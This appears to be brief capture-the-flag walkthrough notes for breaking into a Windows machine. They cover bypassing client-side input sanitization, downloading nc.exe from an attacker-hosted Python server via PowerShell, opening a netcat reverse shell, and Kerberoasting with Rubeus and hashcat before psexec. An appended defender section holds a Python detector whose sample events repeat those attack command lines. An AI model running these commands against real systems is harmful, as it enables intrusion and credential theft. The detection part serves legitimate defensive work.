- Network enumeration: nmap -sC -sT -vv <ip>
Check the website and create new account
Go to the profile page and try to change the username to one containing special characters (; ? | " :) to see whether they are accepted.
You can't add those characters.
Now open the browser's inspect element and look at the Network tab:
you can see a request for a script in some directory.
When you block this URL, the login input is no longer sanitized (the sanitization is client-side only).
Now we are able to input payloads or commands.
Our plan now is to get a listener (netcat) onto the victim machine.
To transfer nc.exe we will serve it with Python:
"python -m http.server"
Then we enter this command on the victim website: "powershell curl <ip>:8000/nc.exe -o nc.exe"
Set up a new listener with netcat.
Now run "nc.exe <ip> <port> -e powershell" to get a reverse shell.
And now we have a shell.
Let's prepare Rubeus.exe, the tool we will use for privilege escalation.
Now let's crack the Kerberos TGS-REP hash: "hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt"
Now let's use "psexec.py".
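From the defender's side, the chain above (web server spawning PowerShell, PowerShell pulling a file from a bare host:port and writing it to disk, nc.exe launched with -e) is easy to spot in process-creation telemetry. The following is an added example, not part of the original notes: a small detector run over constructed sample events in a hypothetical (parent image, image, command line) format; the IP 10.0.0.5 and port 4444 are made up.

```python
import re

# Constructed sample process-creation events (hypothetical format:
# parent image, image, command line), modelled on the chain in the notes.
SAMPLE_EVENTS = [
    ("w3wp.exe", "powershell.exe", "powershell curl 10.0.0.5:8000/nc.exe -o nc.exe"),
    ("powershell.exe", "nc.exe", "nc.exe 10.0.0.5 4444 -e powershell"),
    ("explorer.exe", "powershell.exe", "powershell Get-Process"),
    ("svchost.exe", "cmd.exe", "cmd /c dir"),
]

# Assumed web server and shell image names; extend for your environment.
WEB_SERVER_IMAGES = {"w3wp.exe", "httpd.exe", "nginx.exe", "node.exe", "python.exe"}
SHELL_IMAGES = {"powershell.exe", "cmd.exe", "pwsh.exe"}

# A shell downloading from a bare host:port URL straight to a file on disk.
DOWNLOAD_RE = re.compile(
    r"(curl|iwr|invoke-webrequest|wget)\s+\S+:\d+/\S+\s+-o\s+\S+", re.I)
# A netcat binary started with -e to attach a command interpreter.
NC_EXEC_RE = re.compile(r"\bnc(64)?\.exe\b.*\s-e\s+(powershell|cmd)", re.I)


def classify(parent, image, cmdline):
    """Return the list of alert names raised by one process-creation event."""
    alerts = []
    if parent.lower() in WEB_SERVER_IMAGES and image.lower() in SHELL_IMAGES:
        alerts.append("web_server_spawned_shell")
    if image.lower() in SHELL_IMAGES and DOWNLOAD_RE.search(cmdline):
        alerts.append("shell_download_to_disk")
    if NC_EXEC_RE.search(cmdline):
        alerts.append("netcat_exec_shell")
    return alerts


def scan(events):
    """Map event index -> alerts, keeping only events that raised something."""
    result = {}
    for i, (parent, image, cmdline) in enumerate(events):
        alerts = classify(parent, image, cmdline)
        if alerts:
            result[i] = alerts
    return result


if __name__ == "__main__":
    for i, alerts in scan(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i][2], "->", alerts)
```

The first two sample events raise alerts; the two benign ones do not, so the rules can be tuned against real telemetry without drowning in noise.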